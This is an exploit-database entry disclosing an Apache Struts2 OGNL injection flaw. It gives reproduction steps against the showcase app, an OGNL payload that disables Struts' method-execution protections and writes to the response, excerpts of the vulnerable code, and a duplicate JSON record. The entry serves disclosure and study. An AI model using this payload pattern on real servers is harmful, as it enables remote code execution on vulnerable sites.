Search...

Apache Struts2 Remote Code Execution

2012-08-22T00:00:00

ID PACKETSTORM:115770
Type packetstorm
Reporter kxlzx
Modified 2012-08-22T00:00:00

Description

                                        
                                            `this method was published at xcon2012 xcon.xfocus.net.  
kxlzx http://www.inbreak.net  
  
flow this and step by step:  
  
1, down load struts2-showcase from struts.apache.org  
2, run struts2-showcase.  
3, open url:   
http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV  
4, write skill name to %{expr} for example:  
%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}  
5, submit and all will done.  
  
this method:  
public static String translateVariables(String expression, ValueStack stack) {  
return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString();  
}  
look two char "$" and "%"  
  
and  
this method:  
  
public static Object translateVariables(char[] openChars, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {  
// deal with the "pure" expressions first!  
//expression = expression.trim();  
Object result = expression;  
for (char open : openChars) {  
.........  
while (true) {  
..........  
String var = expression.substring(start + 2, end);  
  
Object o = stack.findValue(var, asType);  
............  
if user input is "%{expr}"  
this will execute ognl like:  
${%{expr}}  
  
this need devloper code like:  
  
&lt;action name="redirect" class="net.inbreak.RedirectAction"&gt;  
&lt;result name="redirect" type="redirect"&gt;${redirectUrl}&lt;/result&gt;  
&lt;/action&gt;  
  
or like:  
&lt;action name="save" class="org.apache.struts2.showcase.action.SkillAction" method="save"&gt;  
&lt;result type="redirect"&gt;edit.action?skillName=${currentSkill.name}&lt;/result&gt;  
&lt;/action&gt;  
  
----------  
kxlzx at alibaba security team.  
my blog :http://www.inbreak.net  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:115770", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Apache Struts2 Remote Code Execution", "description": "", "published": "2012-08-22T00:00:00", "modified": "2012-08-22T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/115770/Apache-Struts2-Remote-Code-Execution.html", "reporter": "kxlzx", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:37", "viewCount": 10, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/115770/struts2-exec.txt", "sourceData": "`this method was published at xcon2012 xcon.xfocus.net. \nkxlzx http://www.inbreak.net \n \nflow this and step by step: \n \n1, down load struts2-showcase from struts.apache.org \n2, run struts2-showcase. \n3, open url: \nhttp://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV \n4, write skill name to %{expr} for example: \n%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false)(#hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())} \n5, submit and all will done. \n \nthis method: \npublic static String translateVariables(String expression, ValueStack stack) { \nreturn translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString(); \n} \nlook two char \"$\" and \"%\" \n \nand \nthis method: \n \npublic static Object translateVariables(char[] openChars, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) { \n// deal with the \"pure\" expressions first! \n//expression = expression.trim(); \nObject result = expression; \nfor (char open : openChars) { \n......... \nwhile (true) { \n.......... \nString var = expression.substring(start + 2, end); \n \nObject o = stack.findValue(var, asType); \n............ \nif user input is \"%{expr}\" \nthis will execute ognl like: \n${%{expr}} \n \nthis need devloper code like: \n \n<action name=\"redirect\" class=\"net.inbreak.RedirectAction\"> \n<result name=\"redirect\" type=\"redirect\">${redirectUrl}</result> \n</action> \n \nor like: \n<action name=\"save\" class=\"org.apache.struts2.showcase.action.SkillAction\" method=\"save\"> \n<result type=\"redirect\">edit.action?skillName=${currentSkill.name}</result> \n</action> \n \n---------- \nkxlzx at alibaba security team. \nmy blog :http://www.inbreak.net \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645414996}}